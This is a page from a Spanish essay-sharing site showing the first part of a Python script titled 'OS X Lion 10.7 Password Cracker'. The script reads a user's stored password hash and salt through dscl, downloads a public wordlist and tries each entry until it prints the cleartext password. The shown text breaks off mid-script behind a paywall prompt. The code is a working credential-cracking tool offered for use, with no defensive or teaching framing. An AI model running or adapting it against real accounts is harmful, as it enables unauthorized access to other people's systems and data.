ClubEnsayos.com - Ensayos de Calidad, Tareas y Monografias
Buscar

Crack Os Lion Root


Enviado por   •  18 de Marzo de 2012  •  356 Palabras (2 Páginas)  •  553 Visitas

Página 1 de 2

##########################################

#* OS X Lion 10.7 Password Cracker

from subprocess import *

import hashlib

import os

import urllib2

import sys

from string import *

link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file

defaultuser = False

username = ""

def check(password): # Hash password and compare

if not password.startswith("#!"): # Ignore comments

guess = hashlib.sha512(salt_hex + password).hexdigest()

print("Trying... " + password)

if guess == hash:

print("Cleartext password for user '"+username+"' is : "+password)

exit(0)

if len(sys.argv) < 2:

print("No username given. Defaulting to current user.")

defaultuser = True

else:

username = sys.argv[1]

p = Popen("whoami", shell=True, stdout=PIPE)

whoami = p.communicate()[0]

if defaultuser:

username = whoami.rstrip()

p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)

dscl_out = p.communicate()[0]

list = dscl_out.split("\n")

for pos,item in enumerate(list): # extract digest

if "dsAttrTypeNative:ShadowHashData" in item:

digest = list[pos+1].replace(" ", "")

if len(digest) == 262: # Out of box configuration

salt = digest[56:64]

hash = digest[64:192]

elif len(digest) == 314: # SMB turned on

print("SMB is on")

salt

...

Descargar como (para miembros actualizados)  txt (2.7 Kb)  
Leer 1 página más »
Disponible sólo en Clubensayos.com